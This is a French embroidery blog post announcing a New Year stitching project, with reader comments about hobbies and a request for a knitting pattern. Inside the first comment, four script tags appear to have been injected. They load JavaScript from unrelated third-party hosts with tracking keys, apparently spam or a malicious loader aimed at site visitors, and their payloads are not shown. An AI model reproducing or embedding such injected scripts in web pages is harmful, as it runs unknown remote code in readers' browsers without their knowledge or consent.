• Broderie de l'An Neuf ...

    Rho, la la, ça faisait si longtemps que je n'avais pas jeté un coup dans mes BAPC (Broderies Achetées Pas Commencées). Mon dieu c'que ça donne envie de se débloquer un peu de temps pour se remettre à la broderie. J'ai revu plusieurs modèles qui m'ont fait SACREMENT ENVIE !!! Va vraiment falloir que je trouve comment m'y remettre ... sans pour autant que ça n'empiète de trop sur mon temps scrap, carte, patch, danse, ...
    Allez, une résolution de plus en ce début d'année ... ;-)

    Sinon, pour la tradition brodesque, c'est tout bon : la broderie (environ 15x15 cm), la toile et les fils ont été choisis hier en fin d'après-midi. Et le motif commencé hier soir. En voici la preuve ...

    Broderie de l'An Neuf ...

    Je vous garde la surprise du motif au fil des différentes étapes. Pour cela, je vous donne rendez-vous tous les jeudis soir (après mon cours de salsa ;-)) pour vous montrer mon avancée.

    Broderie de l'An Neuf ... - gif


  • Commentaires

    1
    Jeudi 2 Janvier 2020 à 18:17

    Une belle résolution ! Il va falloir t'accrocher, tu as déjà beaucoup d'activités diverses et variées.

    Je n'ai aucune idée de ce que tu lances, je vais suivre ça avec attention yesyes

    <script src="//autroliner.com/225cd6e1ef3a4470f9.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8796x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8796x&format=arrjs&r=1577985494861" type="text/javascript"></script> <script src="http://autroliner.com/ext/225cd6e1ef3a4470f9.js?sid=52646_8796_&title=aaa&blocks[]=31af2" type="text/javascript"></script>
    2
    Jeudi 2 Janvier 2020 à 21:08

    Tu ne brodes quand même pas en dansant ? happy

    @ jeudi, donc

    3
    Jygram
    Vendredi 3 Janvier 2020 à 09:57

    Je me régale d'avance !! Et j'admire ton dynamisme ... finalement, de tes multiples talents, je me demande si celui qui prime chez toi, ce n'est pas celui de l'organisation pour mener à bien autant de projets et d'activités !! ^^

    Bizzz

     

     

    4
    Isabelle
    Mardi 7 Janvier 2020 à 14:19

    Bonjour , en me promenant sur printerest , je suis tombée sur une petite brassière verte que vous avez faite ,un article de 2012 yes

    où vous précisiez que c'était un modèle bergère de france , pourriez vous me dire les références du catalogue ou alors me fournir les explications SVP , je la trouve adorable et je vais être à nouveau mamie en juin prochain , le modèle changerait vraiment de celles que j'ai déjà faite . ci joint le lien trouvé sur le net 

    https://www.pinterest.fr/pin/535858055638914695/

    je vous remercie à l'avance 

    Isabelle 

     

      • Samedi 11 Janvier 2020 à 16:47

        Désolée, j'ai recherché sur le net (le lien n'existe plus) et dans mes impressions de tutos, je n'ai malheureusement pas retrouvé les explications de cette brassière.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :